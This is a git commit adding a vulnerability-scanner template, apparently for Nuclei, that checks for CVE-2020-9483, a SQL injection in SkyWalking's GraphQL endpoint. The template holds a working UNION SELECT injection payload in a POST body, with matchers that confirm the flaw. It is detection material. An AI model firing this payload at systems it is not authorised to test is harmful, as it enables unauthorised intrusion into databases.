Create CVE-2020-9483.yaml

2021-03-21 04:54:00 +00:00 · 2021-03-21 04:54:00 +00:00 · 0fefcdebcc
parent ea0f3a2f48
commit 0fefcdebcc
1 changed files with 35 additions and 0 deletions
--- a/cves/2020/CVE-2020-9483.yaml
+++ b/cves/2020/CVE-2020-9483.yaml
@ -0,0 +1,35 @@
+id: CVE-2020-9483
+
+info:
+  name: SkyWalking SQLI
+  author: pikpikcu
+  severity: high
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9483
+  tags: cve,cve2020,sqli,skywalking
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/graphql"
+    headers:
+      Content-Type: application/json
+    body: |
+      {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}}
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: application/json"
+        part: header
+
+      - type: word
+        words:
+          - "UNION SELECT 1,CONCAT('~','9999999999','~')--"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200